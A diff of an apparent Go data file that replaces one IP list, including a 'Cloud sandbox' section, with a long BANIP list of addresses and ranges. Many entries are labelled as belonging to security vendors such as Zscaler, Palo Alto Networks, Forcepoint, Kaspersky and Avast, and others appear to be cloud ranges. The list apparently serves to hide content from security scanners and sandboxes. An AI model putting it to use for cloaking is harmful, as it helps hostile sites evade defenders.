-150.107.43.140 -152.70.65.244 -45.234.32.185 -191.31.27.109 -45.234.32.185 -177.157.81.57 -210.4.6.23 -40.68.125.53 -45.234.32.185 -177.159.62.182 -45.234.32.185 -200.187.162.92 -152.250.165.17 -77.31.1.91 -191.17.237.12 -64.90.127.143 -102.64.7.34 -124.120.86.174 -185.184.64.193 -45.234.32.185 -41.242.48.30 -212.114.197.248 -45.234.32.185 -187.58.53.97 -201.92.135.162 -45.234.32.185 -45.234.32.185 -45.236.240.89 -45.234.32.185 -65.64.176.102 -45.234.32.185 -191.31.81.53 -45.234.32.185 -187.75.89.161 -72.5.203.126 -186.218.195.205 -179.251.156.101 - -# Cloud sandbox -74.125.190.14 -220.181.151.179 -8.210.169.243 -220.181.151.173 -173.194.171.9 -218.12.99.192 -218.12.99.209 -172.217.43.215 -172.217.43.209 -172.253.4.3 -74.125.41.67 -172.217.42.10 -172.253.5.5 -172.253.5.1 -172.253.6.5 -172.253.6.2 -172.217.42.6 -60.205.226.65 -172.70.205.84 -172.69.32.100 -172.253.1.4 -74.125.181.129 -60.29.229.59 -172.253.4.4 -173.194.93.5 -172.253.211.66 -220.181.151.176 -172.253.237.3 -218.12.99.183 -172.253.4.2 -172.69.32.104 -74.125.190.147 -220.181.151.174 -172.253.6.3 -172.217.42.12 -172.217.43.141 -172.253.1.5 -172.70.205.83 -172.253.4.1 -172.253.211.71 -195.123.241.30 -106.75.21.38 -173.194.93.13 -106.75.64.221 -87.115.231.238 -172.255.125.168 -195.123.240.173 -106.75.33.178 -106.75.75.245 -106.75.4.47 -106.75.62.127 -117.50.23.192 -106.75.101.97 -202.129.16.147 -138.199.18.141 -20.199.106.211 -117.50.6.105 -106.75.12.189 -20.79.223.156 -146.70.37.210 -165.231.253.215 -51.75.141.254 -106.75.66.75 -106.75.96.77 -218.232.76.136 -46.246.122.39 -13.235.76.19 -193.19.204.73 -164.90.241.135 -13.36.176.42 -202.43.6.38 -117.50.8.39 -117.50.22.141 -202.129.16.151 -107.150.31.136 -68.183.245.101 -92.17.138.152 -109.249.187.24 -128.90.63.96 -18.197.46.220 -` +package data + +var BANIP = ` +100.20.0.0/16 +100.24.0.0/16 +103.10.197.50 +103.13.69.0/24 +103.16.16.107 +103.19.168.0/24 # Dell SonicWALL +103.234.220.197 +103.236.201.110 +103.236.201.57 +103.245.47.20 +103.246.0.0/16 +103.250.31.0/24 # Sophos Technologies Pvt. Ltd +103.27.124.82 +103.29.28.0/24 # Sophos Technologies Pvt. LtdIndia +103.29.70.23 +103.35.74.75 +103.35.74.77 +103.3.61.114 +103.4.0.0/16 +103.56.207.84 +103.8.0.0/16 +103.8.79.229 +103.96.20.0/22 +104.129.192.0/23 # Zscaler +104.129.192.0/23 # ZSCALER +104.129.192.0/24 # Zscaler +104.129.194.0/23 # Zscaler +104.129.194.0/23 # ZSCALER +104.129.194.0/24 # Zscaler +104.129.195.0/24 # Zscaler +104.129.196.0/23 # Zscaler +104.129.196.0/23 # ZSCALER +104.129.198.0/23 # Zscaler +104.129.198.0/23 # ZSCALER +104.129.200.0/23 # Zscaler +104.129.200.0/23 # ZSCALER +104.129.200.0/24 # Zscaler +104.129.201.0/24 # Zscaler +104.129.202.0/23 # Zscaler +104.129.202.0/23 # ZSCALER +104.129.204.0/23 # Zscaler +104.129.204.0/23 # ZSCALER +104.129.204.0/24 +104.129.204.0/24 # Zscaler +104.129.205.0/24 # Zscaler +104.129.206.0/23 # Zscaler +104.129.206.0/23 # ZSCALER +104.131.157.171 +104.132.0.72 +104.192.0.58 +104.200.20.46 +104.208.0.0/16 +104.208.158.116 +104.209.0.0/16 +104.210.0.0/16 +104.211.0.0/16 +104.214.0.0/16 +104.215.0.0/16 +104.218.63.73 +104.218.63.74 +104.218.63.75 +104.218.63.76 +104.219.104.0/24 # F5 Networks, Inc. +104.219.105.0/24 # F5 Networks, Inc. +104.219.106.0/24 # F5 Networks, Inc. +104.219.107.0/24 # F5 Networks, Inc. +104.219.108.0/24 # F5 Networks, Inc. +104.219.110.0/24 # F5 Networks, Inc. +104.219.111.0/24 # F5 Networks, Inc. +104.223.123.98 +104.236.141.156 +104.244.72.200 +104.244.74.78 +104.40.0.0/13 +104.40.0.0/16 +104.41.0.0/16 +104.42.0.0/16 +104.43.0.0/16 +104.44.0.0/16 +104.45.0.0/16 +104.46.0.0/16 +104.47.0.0/16 +106.187.37.101 +107.181.174.84 +107.20.0.0/16 +107.23.0.0/16 +109.126.9.228 +109.169.33.163 +109.190.182.44 +109.201.133.100 +109.69.67.17 +111.221.0.0/16 +111.248.62.31 +115.164.86.121 +115.70.208.19 +116.50.57.0/24 # Forcepoint Cloud Hong Kong +116.50.57.0/24 # Forcepoint Cloud Hong KongHong Kong +116.50.58.0/24 # Forcepoint Cloud AustraliaHong Kong +116.50.59.0/24 # Forcepoint Cloud IndiaHong Kong +116.50.60.0/24 # Forcepoint Cloud SingaporeHong Kong +116.50.61.0/24 # Forcepoint Cloud JapanHong Kong +116.50.62.0/24 # Forcepoint Cloud New ZealandHong Kong +118.163.74.160 +120.29.217.46 +122.248.0.0/16 +12.34.97.0/24 # +124.109.1.207 +124.47.150.0/24 +124.47.189.0/24 +125.212.241.182 +126.72.58.19 +128.177.125.0/24 # Zscaler +128.177.125.0/24 # ZSCALER +128.177.129.0/24 # Zscaler +128.177.129.0/24 # ZSCALER +128.177.136.0/24 # Zscaler +128.177.136.0/24 # ZSCALER +128.199.47.160 +128.199.76.145 +128.52.128.105 +130.204.161.3 +131.253.0.0/16 +133.218.180.149 +134.170.0.0/16 +137.116.0.0/16 +137.117.0.0/16 +137.135.0.0/16 +137.74.167.96 +137.74.169.241 +137.74.73.179 +137.83.128.0/24 # Zscaler +137.83.129.0/24 # +137.83.130.0/24 # +137.83.131.0/24 # Zscaler +137.83.132.0/24 # Zscaler +137.83.133.0/24 # Zscaler +137.83.134.0/24 # Zscaler +137.83.135.0/24 # Zscaler +137.83.137.0/24 # Zscaler +137.83.139.0/24 # Zscaler +137.83.140.0/24 # +137.83.141.0/24 # +137.83.142.0/24 # +137.83.145.0/24 # Zscaler +137.83.145.0/24 # Zscaler Softech India Private Limited +137.83.146.0/24 # Zscaler +137.83.148.0/24 # +137.83.149.0/24 # +137.83.150.0/24 # Zscaler +137.83.151.0/24 # Zscaler +137.83.152.0/24 # Zscaler +137.83.153.0/24 # Zscaler +137.83.154.0/24 # +137.83.155.0/24 # +137.83.157.0/24 # +137.83.158.0/24 # +137.83.159.0/24 # +137.83.194.0/24 # Palo Alto Networks +137.83.196.0/24 # Palo Alto Networks +137.83.197.0/24 # Palo Alto Networks +137.83.200.0/24 # Palo Alto Networks +137.83.201.0/24 # Palo Alto Networks +137.83.202.0/24 # Palo Alto Networks +137.83.203.0/24 # Palo Alto Networks +137.83.206.0/23 # Palo Alto Networks +137.83.208.0/24 # Palo Alto Networks +137.83.209.0/24 # Palo Alto Networks +137.83.211.0/24 # Palo Alto Networks +137.83.212.0/24 # Palo Alto Networks +137.83.213.0/24 # Palo Alto Networks +137.83.216.0/21 # Palo Alto Networks +137.83.224.0/20 # Palo Alto Networks +137.83.240.0/21 # Palo Alto Networks +137.83.248.0/23 # Palo Alto Networks +137.83.250.0/24 # Palo Alto Networks +137.83.251.0/24 # Palo Alto Networks +13.79.231.167 +138.197.167.60 +138.197.207.243 +138.197.85.80 +138.91.0.0/16 +139.162.105.26 +139.162.10.72 +139.162.124.207 +139.162.16.13 +139.162.226.245 +139.162.28.23 +139.162.28.31 +139.180.242.0/23 # Palo Alto Networks +139.180.244.0/23 # Palo Alto Networks +139.180.246.0/23 # Palo Alto Networks +139.59.213.165 +139.59.62.94 +141.170.2.53 +141.193.177.0/24 # Barracuda Security Group +141.255.189.161 +14.202.230.49 +142.4.211.161 +142.44.166.241 +143.127.100.0/24 +143.127.10.0/23 +143.127.102.0/24 +143.127.103.0/24 +143.127.119.0/24 +143.127.136.0/24 +143.127.138.0/24 +143.127.139.0/24 +143.127.14.0/23 +143.127.2.0/24 +143.127.241.0/24 +143.127.242.0/23 +143.127.87.0/24 +143.127.89.0/24 +143.127.93.0/24 +143.204.0.0/16 +144.217.161.119 +144.217.167.240 +144.217.174.248 +144.217.240.34 +144.217.94.195 +144.217.94.96 +145.220.75.103 +145.239.29.201 +145.239.74.47 +145.239.82.79 +145.239.91.37 +146.101.76.0/23 +146.101.78.0/24 +146.185.177.103 +147.135.156.122 +147.161.128.0/17 # Zscaler +147.161.128.0/17 # Zscaler Switzerland GmbHSwitzerland +147.161.164.0/23 # Zscaler +147.161.164.0/23 # Zscaler Switzerland GmbHSwitzerland +147.161.166.0/23 # Switzerland +148.163.148.0/22 +148.163.156.0/23 +148.64.0.0/19 # Symantec Corporation +148.64.24.0/24 # Symantec Corporation +149.202.185.34 +149.56.201.79 +149.56.223.241 +149.7.193.0/24 # PSINet, Inc. +150.70.0.0/22 +150.70.0.0/22 # Japan Network Information CenterJapan +150.70.104.0/22 +150.70.110.0/24 +150.70.112.0/20 +150.70.12.0/22 +150.70.12.0/22 # Japan Network Information CenterJapan +150.70.160.0/20 +150.70.160.0/20 # Japan Network Information CenterJapan +150.70.176.0/20 +150.70.176.0/20 # Japan Network Information CenterJapan +150.70.192.0/21 +150.70.192.0/21 # Japan Network Information CenterJapan +150.70.224.0/20 +150.70.224.0/20 # Japan Network Information Center +150.70.240.0/20 +150.70.31.0/24 +150.70.31.0/24 # Japan Network Information CenterJapan +150.70.4.0/22 +150.70.4.0/22 # Japan Network Information CenterJapan +150.70.48.0/20 # Japan Network Information CenterJapan +150.70.64.0/18 +150.70.64.0/20 +150.70.80.0/20 +150.70.80.0/20 # Japan Network Information CenterJapan +150.70.8.0/22 +150.70.8.0/22 # Japan Network Information CenterJapan +150.70.96.0/20 +151.80.238.152 +154.127.60.92 +154.16.149.35 +154.16.149.74 +154.59.123.0/24 +154.59.126.0/24 +155.133.64.203 +155.4.230.97 +155.4.250.85 +155.64.105.0/24 +155.64.138.0/24 +155.64.16.0/23 +155.64.23.0/24 +155.64.23.0/24 # Symantec Corporation +155.64.38.0/24 +155.64.40.0/24 +155.64.49.0/24 +155.64.56.0/24 +155.64.56.0/24 # Symantec Corporation +155.64.63.0/24 +155.64.63.0/24 # Symantec Corporation +156.67.106.251 +156.67.106.30 +156.67.106.32 +157.167.100.0/24 # Forcepoint Cloud Accra ACCA +157.167.10.0/24 # Forcepoint Cloud Belmopan BCVA +157.167.101.0/24 # Forcepoint Cloud Yamoussoukro ASKA +157.167.102.0/24 # Forcepoint Cloud Nairobi WILA +157.167.1.0/24 # Forcepoint Cloud Ltd +157.167.103.0/24 # Forcepoint Cloud Monrovia LIRA +157.167.104.0/24 # Forcepoint Cloud Valletta MLAA +157.167.105.0/24 # +157.167.106.0/24 # Forcepoint Cloud Monte Carlo MCMA +157.167.107.0/24 # +157.167.108.0/24 # Forcepoint Cloud Abuja ABVA +157.167.109.0/24 # Forcepoint Cloud San Marino RMIA +157.167.110.0/24 # Forcepoint Cloud Tunis TUNA +157.167.11.0/24 # Forcepoint Cloud San Jose SJOA +157.167.111.0/24 # +157.167.112.0/24 # Forcepoint Cloud The Valley AXAA +157.167.113.0/24 # +157.167.114.0/24 # Forcepoint Cloud Nassau NASA +157.167.115.0/24 # Forcepoint Cloud Bridgetown BGIA +157.167.116.0/24 # Forcepoint Cloud Hamilton BDAA +157.167.117.0/24 # Forcepoint Cloud Road Town EISA +157.167.118.0/24 # Forcepoint Cloud George Town GCMA +157.167.119.0/24 # +157.167.120.0/24 # Forcepoint Cloud Santo Domingo SDQA +157.167.12.0/24 # Forcepoint Cloud Quito UIOA +157.167.121.0/24 # +157.167.122.0/24 # +157.167.123.0/24 # +157.167.124.0/24 # Forcepoint Cloud Basseterre SKBA +157.167.125.0/24 # +157.167.126.0/24 # +157.167.127.0/24 # Forcepoint Cloud Nuuk GOHA +157.167.128.0/24 # +157.167.13.0/24 # Forcepoint Cloud San Salvador SALA +157.167.131.0/24 # +157.167.14.0/24 # Forcepoint Cloud Guatemala City GUAA +157.167.15.0/24 # Forcepoint Cloud Tegucigalpa TGUA +157.167.16.0/24 # +157.167.17.0/24 # Forcepoint Cloud La Paz LPBA +157.167.18.0/24 # Forcepoint Cloud Santiago SCLA +157.167.19.0/24 # Forcepoint Cloud Cayenne CAYA +157.167.200.0/24 # Forcepoint Cloud Ltd +157.167.20.0/24 # +157.167.2.0/24 # +157.167.21.0/24 # +157.167.22.0/24 # Forcepoint Cloud Lima LIMA +157.167.23.0/24 # +157.167.24.0/24 # Forcepoint Cloud Montevideo MVDA +157.167.25.0/24 # Forcepoint Cloud Caracas CCSA +157.167.26.0/24 # Forcepoint Cloud Seoul ICNA +157.167.27.0/24 # Forcepoint Cloud Bandar Seri Begawan BWNA +157.167.28.0/24 # Forcepoint Cloud Phnom Penh PNHA +157.167.29.0/24 # Forcepoint Cloud Bangkok BKKA +157.167.30.0/24 # Forcepoint Cloud Dili DILA +157.167.3.0/24 # +157.167.31.0/24 # Forcepoint Cloud Hanoi HANA +157.167.32.0/24 # Forcepoint Cloud Vientiane VTEA +157.167.33.0/24 # Forcepoint Cloud Kuala Lumpur KLIA +157.167.34.0/24 # Forcepoint Cloud Jakarta CGKA +157.167.35.0/24 # Forcepoint Cloud Naypyidaw NYTA +157.167.36.0/24 # Forcepoint Cloud Macau MFMA +157.167.37.0/24 # Forcepoint Cloud Ulaanbaatar ULNA +157.167.38.0/24 # Forcepoint Cloud Taipei TPEA +157.167.39.0/24 # Forcepoint Cloud Manila MNLA +157.167.40.0/24 # Forcepoint Cloud Port Moresby POMA +157.167.41.0/24 # Forcepoint Cloud Suva SUVA +157.167.42.0/24 # Forcepoint Cloud Papeete PPTA +157.167.43.0/24 # Forcepoint Cloud Reykjavik KEFA +157.167.44.0/24 # Forcepoint Cloud Vilnius VNOA +157.167.45.0/24 # Forcepoint Cloud Copenhagen CPHA +157.167.46.0/24 # Forcepoint Cloud Warsaw WAWB +157.167.47.0/24 # Forcepoint Cloud Stockholm ARNA +157.167.48.0/24 # +157.167.49.0/24 # Forcepoint Cloud Tallin TLLA +157.167.50.0/24 # +157.167.51.0/24 # Forcepoint Cloud Moscow MOWA +157.167.52.0/24 # Forcepoint Cloud Kiev IEVA +157.167.53.0/24 # Forcepoint Cloud Gibraltar GIBA +157.167.54.0/24 # Forcepoint Cloud Dublin DUBA +157.167.55.0/24 # Forcepoint Cloud Ltd +157.167.56.0/24 # Forcepoint Cloud Lisbon LISA +157.167.57.0/24 # Forcepoint Cloud Ottawa YYZB +157.167.58.0/24 # Forcepoint Cloud Tirana TIAA +157.167.59.0/24 # Forcepoint Cloud Vienna VIEA +157.167.60.0/24 # Forcepoint Cloud Sarajevo SJJA +157.167.61.0/24 # Forcepoint Cloud Sofia SOFA +157.167.62.0/24 # Forcepoint Cloud Zagreb ZAGA +157.167.63.0/24 # +157.167.64.0/24 # Forcepoint Cloud Prague PRGA +157.167.65.0/24 # Forcepoint Cloud Athens ATHA +157.167.66.0/24 # +157.167.67.0/24 # Forcepoint Cloud Rome ITAA +157.167.68.0/24 # Forcepoint Cloud Skopje SKPA +157.167.69.0/24 # Forcepoint Cloud Chisinau KIVA +157.167.70.0/24 # Forcepoint Cloud Podgorica TGDA +157.167.71.0/24 # +157.167.72.0/24 # Forcepoint Cloud Belgrade BEGA +157.167.73.0/24 # +157.167.74.0/24 # +157.167.75.0/24 # Forcepoint Cloud Yerevan EVNA +157.167.76.0/24 # Forcepoint Cloud Baku GYDA +157.167.77.0/24 # Forcepoint Cloud Sana'a SAHA +157.167.78.0/24 # Forcepoint Cloud Manama BAHA +157.167.79.0/24 # Forcepoint Cloud Dhaka BZLA +157.167.80.0/24 # Forcepoint Cloud Thimphu PBHA +157.167.81.0/24 # +157.167.82.0/24 # Forcepoint Cloud Tbilisi TBSA +157.167.83.0/24 # Forcepoint Cloud Baghdad BGWA +157.167.84.0/24 # Forcepoint Cloud Amman AMMA +157.167.85.0/24 # Forcepoint Cloud Nur-Sultan ALAA +157.167.86.0/24 # Forcepoint Cloud Kuwait City KWIA +157.167.87.0/24 # Forcepoint Cloud Beirut LEBA +157.167.88.0/24 # Forcepoint Cloud Male MLEA +157.167.89.0/24 # Forcepoint Cloud Kathmandu KTMA +157.167.90.0/24 # Forcepoint Cloud Muscat MCTA +157.167.91.0/24 # Forcepoint Cloud Islamabad ISBA +157.167.92.0/24 # Forcepoint Cloud Doha DOHA +157.167.93.0/24 # Forcepoint Cloud Riyadh RUHA +157.167.94.0/24 # Forcepoint Cloud Sri Jayawardenepura Kotte CMBA +157.167.95.0/24 # Forcepoint Cloud Luxembourg City LUXA +157.167.96.0/24 # Forcepoint Cloud Bern BRNA +157.167.97.0/24 # Forcepoint Cloud Algiers ALGA +157.167.98.0/24 # Forcepoint Cloud Luanda LADA +157.167.99.0/24 # Forcepoint Cloud Addis Ababa ADDA +157.175.0.0/16 +157.55.0.0/16 +157.56.0.0/16 +158.255.6.242 +158.255.7.61 +158.69.215.7 +158.69.83.25 +160.1.0.0/16 +161.184.238.220 +162.219.176.26 +162.220.246.230 +162.221.201.57 +162.243.166.137 +162.243.75.204 +162.247.72.199 +162.247.72.200 +162.247.72.201 +162.247.72.202 +162.247.72.213 +162.247.72.216 +162.247.72.217 +162.247.72.27 +162.247.72.7 +162.247.73.204 +162.247.73.206 +163.172.101.137 +163.172.136.101 +163.172.137.174 +163.172.137.222 +163.172.138.11 +163.172.139.161 +163.172.140.123 +163.172.151.250 +163.172.151.47 +163.172.160.182 +163.172.162.106 +163.172.163.85 +163.172.171.163 +163.172.179.129 +163.172.212.115 +163.172.217.50 +163.172.223.200 +163.172.223.87 +164.132.106.162 +164.132.41.140 +164.132.51.91 +164.77.133.220 +165.225.0.0/17 # Zscaler +165.225.0.0/17 # ZSCALER +165.225.0.0/23 # Zscaler +165.225.0.0/23 # ZSCALER +165.225.10.0/23 # Zscaler +165.225.10.0/23 # ZSCALER +165.225.102.0/24 # Zscaler +165.225.104.0/23 # Zscaler +165.225.104.0/23 # ZSCALER +165.225.104.0/24 # Zscaler +165.225.104.0/24 # Zscaler Softech India Private Limited +165.225.105.0/24 # Zscaler +165.225.105.0/24 # Zscaler Softech India Private Limited +165.225.106.0/23 # Zscaler +165.225.106.0/23 # ZSCALER +165.225.106.0/24 # Zscaler +165.225.106.0/24 # Zscaler Softech India Private Limited +165.225.107.0/24 # Zscaler +165.225.107.0/24 # Zscaler Softech India Private Limited +165.225.110.0/23 # Zscaler +165.225.110.0/23 # ZSCALER +165.225.112.0/24 # Zscaler +165.225.113.0/24 # Zscaler +165.225.114.0/24 # Zscaler +165.225.115.0/24 # Zscaler +165.225.116.0/24 # Zscaler +165.225.117.0/24 # Zscaler +165.225.118.0/24 # Zscaler +165.225.12.0/23 # Zscaler +165.225.12.0/23 # ZSCALER +165.225.124.0/23 # Zscaler +165.225.124.0/23 # ZSCALER +165.225.16.0/23 # Zscaler +165.225.16.0/23 # ZSCALER +165.225.192.0/18 # Zscaler +165.225.192.0/18 # ZSCALER +165.225.192.0/23 # Zscaler +165.225.192.0/23 # ZSCALER +165.225.194.0/23 # Zscaler +165.225.194.0/23 # ZSCALER +165.225.196.0/23 # Zscaler +165.225.196.0/23 # ZSCALER +165.225.200.0/23 # +165.225.20.0/23 # +165.225.202.0/23 # +165.225.2.0/24 # Zscaler +165.225.204.0/23 # Zscaler +165.225.206.0/23 # Zscaler +165.225.206.0/23 # ZSCALER +165.225.208.0/23 # Zscaler +165.225.208.0/23 # ZSCALER +165.225.210.0/23 # Zscaler +165.225.210.0/23 # ZSCALER +165.225.214.0/23 # Zscaler +165.225.214.0/23 # ZSCALER +165.225.216.0/23 # +165.225.218.0/23 # +165.225.220.0/23 # +165.225.222.0/23 # Zscaler +165.225.222.0/23 # ZSCALER +165.225.226.0/23 # Zscaler +165.225.226.0/23 # ZSCALER +165.225.230.0/23 # Zscaler +165.225.230.0/23 # ZSCALER +165.225.230.0/24 # Zscaler +165.225.231.0/24 # +165.225.232.0/23 # +165.225.232.0/24 # Zscaler +165.225.233.0/24 # Zscaler +165.225.240.0/23 # Zscaler +165.225.240.0/23 # ZSCALER +165.225.24.0/23 # Zscaler +165.225.24.0/23 # ZSCALER +165.225.242.0/23 +165.225.26.0/23 # Zscaler +165.225.26.0/23 # ZSCALER +165.225.28.0/23 # Zscaler +165.225.28.0/23 # ZSCALER +165.225.30.0/24 # Zscaler +165.225.3.0/24 # Zscaler +165.225.31.0/24 # Zscaler +165.225.32.0/23 # Zscaler +165.225.32.0/23 # ZSCALER +165.225.32.0/24 # Zscaler +165.225.33.0/24 # Zscaler +165.225.34.0/23 # Zscaler +165.225.34.0/23 # ZSCALER +165.225.36.0/23 # Zscaler +165.225.36.0/23 # ZSCALER +165.225.36.0/24 # Zscaler +165.225.37.0/24 # Zscaler +165.225.38.0/23 # Zscaler +165.225.38.0/23 # ZSCALER +165.225.41.0/24 # Zscaler +165.225.42.0/24 # Zscaler +165.225.44.0/24 # Zscaler +165.225.45.0/24 # Zscaler +165.225.46.0/24 # Zscaler +165.225.48.0/24 # Zscaler +165.225.49.0/24 # Zscaler +165.225.50.0/23 # Zscaler +165.225.50.0/23 # ZSCALER +165.225.52.0/24 # Zscaler +165.225.54.0/24 # +165.225.55.0/24 # +165.225.56.0/22 # Zscaler +165.225.56.0/22 # ZSCALER +165.225.60.0/22 # Zscaler +165.225.60.0/22 # ZSCALER +165.225.66.0/24 # Zscaler +165.225.70.0/23 # Zscaler +165.225.70.0/23 # ZSCALER +165.225.70.0/24 # Zscaler +165.225.71.0/24 # Zscaler +165.225.72.0/22 # Zscaler +165.225.72.0/22 # ZSCALER +165.225.72.0/23 # Zscaler +165.225.72.0/23 # ZSCALER +165.225.74.0/24 # Zscaler +165.225.75.0/24 # Zscaler +165.225.76.0/22 # Zscaler +165.225.76.0/23 # Zscaler +165.225.76.0/24 # Zscaler +165.225.78.0/24 # Zscaler +165.225.79.0/24 # +165.225.80.0/23 # Zscaler +165.225.8.0/23 # Zscaler +165.225.8.0/23 # ZSCALER +165.225.82.0/24 # Zscaler +165.225.84.0/23 # Zscaler +165.225.84.0/23 # ZSCALER +165.225.84.0/24 # Zscaler +165.225.85.0/24 # Zscaler +165.225.86.0/23 # Zscaler +165.225.86.0/23 # ZSCALER +165.225.86.0/24 # Zscaler +165.225.87.0/24 # Zscaler +165.225.88.0/23 # Zscaler +165.225.88.0/23 # ZSCALER +165.225.88.0/24 # Zscaler +165.225.89.0/24 # Zscaler +165.225.90.0/23 # +165.225.92.0/23 # Zscaler +165.225.92.0/23 # ZSCALER +165.225.94.0/23 # Zscaler +165.225.94.0/23 # ZSCALER +165.225.95.0/24 # +165.225.96.0/23 # Zscaler +165.225.96.0/23 # ZSCALER +165.225.98.0/24 # Zscaler +165.227.200.152 +165.227.58.177 +165.255.0.0/17 +165.255.186.248 +165.255.224.117 +166.70.15.14 +166.70.207.2 +166.98.138.0/23 # Symantec Corporation +166.98.152.0/23 +166.98.242.0/23 +166.98.242.0/23 # Symantec Corporation +166.98.38.0/24 +166.98.67.0/24 +166.98.71.0/24 +166.98.71.0/24 # Symantec Corporation +167.114.251.167 +167.114.34.150 +168.149.128.0/18 # Symantec Corporation +168.149.240.0/24 # Palo Alto Networks +168.149.241.0/24 # Palo Alto Networks +168.149.242.0/24 # Palo Alto Networks +168.149.243.0/24 # Palo Alto Networks +168.149.244.0/24 # Palo Alto Networks +168.149.245.0/24 # Palo Alto Networks +168.149.246.0/24 # Palo Alto Networks +168.149.247.0/24 # Palo Alto Networks +168.61.0.0/16 +168.62.0.0/16 +168.63.0.0/16 +169.239.183.210 +170.176.240.0/21 # Symantec Corporation +170.250.140.52 +171.25.193.20 +171.25.193.235 +171.25.193.25 +171.25.193.77 +171.25.193.78 +172.102.144.0/24 # Check Point Software Technologies, Inc. +172.102.145.0/24 # Check Point Software Technologies, Inc. +172.102.146.0/24 # +172.102.147.0/24 # +172.102.152.0/24 # Check Point Software Technologies, Inc. +172.102.153.0/24 # Check Point Software Technologies, Inc. +172.102.154.0/24 # Check Point Software Technologies, Inc. +172.102.155.0/24 # Check Point Software Technologies, Inc. +172.102.156.0/24 # Check Point Software Technologies, Inc. +172.102.157.0/24 # Check Point Software Technologies, Inc. +172.102.158.0/24 +172.104.148.28 +172.104.187.79 +172.93.48.163 +172.96.0.0/16 +172.98.193.43 +173.14.173.227 +173.208.153.75 +173.240.208.0/24 # SonicWALL, Inc. +173.240.209.0/24 # SonicWALL, Inc. +173.240.210.0/24 # SonicWALL, Inc. +173.240.211.0/24 # SonicWALL, Inc. +173.240.212.0/24 # SonicWALL, Inc. +173.240.213.0/24 # SonicWALL, Inc. +173.240.214.0/24 # SonicWALL, Inc. +173.240.215.0/24 # SonicWALL, Inc. +173.240.216.0/24 # SonicWALL, Inc. +173.240.220.0/24 # SonicWALL, Inc. +173.240.221.0/24 # SonicWALL, Inc. +173.240.222.0/24 # SonicWALL, Inc. +173.243.128.0/20 +173.243.128.0/20 # Fortinet Inc. +173.243.128.0/21 # Fortinet Inc. +173.243.136.0/21 +173.243.136.0/21 # Fortinet Inc. +173.243.138.0/24 # Fortinet Inc. +173.243.140.0/24 # Fortinet Inc. +173.243.141.0/24 # +173.243.142.0/24 # +173.243.143.0/24 # Fortinet Inc. +173.249.2.79 +173.254.216.66 +173.255.226.142 +173.255.231.125 +173.255.253.173 +173.94.0.0/16 +174.129.0.0/16 +175.41.0.0/16 +176.10.104.240 +176.10.104.243 +176.10.107.180 +176.121.10.52 +176.126.252.11 +176.126.252.12 +176.223.113.26 +176.31.180.157 +176.31.45.3 +176.32.0.0/16 +176.34.0.0/16 +176.36.117.185 +176.38.163.77 +176.58.100.98 +176.58.89.182 +177.133.182.77 +177.157.253.157 +177.39.96.0/24 # Forcepoint Brasil Ger. e Seg. de Internet Ltda.Brazil +177.39.97.0/24 # Forcepoint Brasil Ger. e Seg. de Internet Ltda.Brazil +177.39.98.0/24 # Forcepoint Brasil Ger. e Seg. de Internet Ltda.Brazil +177.39.99.0/24 # Forcepoint Brasil Ger. e Seg. de Internet Ltda.Brazil +177.71.0.0/16 +177.72.0.0/16 +178.17.170.13 +178.17.170.135 +178.17.170.149 +178.17.170.156 +178.17.170.164 +178.17.170.194 +178.17.170.195 +178.17.170.196 +178.17.171.111 +178.17.171.49 +178.17.174.10 +178.17.174.14 +178.17.174.198 +178.175.131.194 +178.18.83.215 +178.202.169.177 +178.20.55.16 +178.20.55.18 +178.209.42.84 +178.236.0.0/16 +178.238.237.44 +178.32.181.97 +178.32.181.98 +178.32.181.99 +180.189.28.0/24 +18.130.0.0/15 +18.132.0.0/13 +18.132.0.0/14 +18.144.0.0/12 +18.160.0.0/11 +18.192.0.0/11 +18.224.0.0/12 +18.240.0.0/13 +18.248.0.0/14 +18.248.1.85 +18.248.2.85 +18.252.0.0/15 +182.75.165.176/30 +184.169.0.0/16 +184.72.0.0/16 +184.73.0.0/16 +184.94.113.0/24 # Canada +184.94.114.0/24 # Canada +185.100.84.108 +185.100.84.82 +185.100.85.101 +185.100.85.112 +185.100.85.147 +185.100.85.190 +185.100.85.191 +185.100.85.192 +185.100.85.61 +185.100.86.100 +185.100.86.141 +185.100.86.154 +185.100.86.167 +185.100.86.199 +185.100.86.217 +185.100.86.69 +185.100.86.86 +185.100.87.206 +185.100.87.207 +185.100.87.82 +185.103.99.60 +185.104.120.2 +185.104.120.3 +185.104.120.4 +185.104.120.7 +185.10.68.119 +185.10.68.139 +185.10.68.191 +185.107.81.233 +185.107.81.234 +185.11.167.4 +185.112.157.135 +185.112.254.195 +185.117.215.9 +185.127.25.68 +185.129.62.62 +185.143.0.0/16 +185.157.232.64 +185.159.128.193 +185.16.200.176 +185.163.1.11 +185.165.168.229 +185.165.168.42 +185.165.168.77 +185.165.169.23 +185.169.235.5 +185.170.42.18 +185.177.59.206 +185.186.77.27 +185.189.14.230 +185.189.14.61 +185.189.92.0/24 # AVG Technologies CZ, s.r.o.Czech Republic +185.189.93.0/24 # AVG Technologies CZ, s.r.o.Czech Republic +185.189.94.0/24 # AVAST Software s.r.o. +185.189.94.0/24 # AVAST Software s.r.o.Czech Republic +185.189.95.0/24 # AVAST Software s.r.o. +185.189.95.0/24 # AVAST Software s.r.o.Czech Republic +185.203.240.111 +185.203.241.120 +185.203.242.105 +185.209.20.165 +185.209.20.209 +185.209.21.47 +185.219.82.241 +185.219.82.242 +185.219.82.243 +185.31.172.234 +185.34.33.2 +185.38.14.171 +185.38.14.215 +185.46.212.0/23 # Zscaler +185.46.212.0/23 # Zscaler Switzerland GmbHSwitzerland +185.46.214.0/23 # Zscaler +185.46.214.0/23 # Zscaler Switzerland GmbHSwitzerland +185.48.0.0/16 +185.51.228.0/24 # AVAST Software s.r.o.Czech Republic +185.51.229.0/24 # AVAST Software s.r.o.Czech Republic +185.51.230.0/24 # AVAST Software s.r.o.Czech Republic +185.51.231.0/24 # AVAST Software s.r.o. +185.51.231.0/24 # AVAST Software s.r.o.Czech Republic +185.54.220.0/24 # Kaspersky Lab KDP +185.54.220.0/24 # Kaspersky Lab KDPRussian Federation +185.54.221.0/24 # Kaspersky Lab KDPRussian Federation +185.54.222.0/24 # Kaspersky Lab KDPRussian Federation +185.58.84.0/22 +185.61.138.207 +185.61.149.193 +185.62.57.91 +185.65.205.10 +185.66.200.10 +185.70.11.132 +185.72.244.24 +185.82.216.233 +185.82.217.51 +185.82.217.70 +185.85.12.0/24 # Kaspersky Lab AORussian Federation +185.85.14.0/24 # Kaspersky Lab AORussian Federation +185.85.15.0/24 # Kaspersky Lab AO +185.85.15.0/24 # Kaspersky Lab AORussian Federation +185.86.149.175 +185.87.111.113 +185.87.185.45 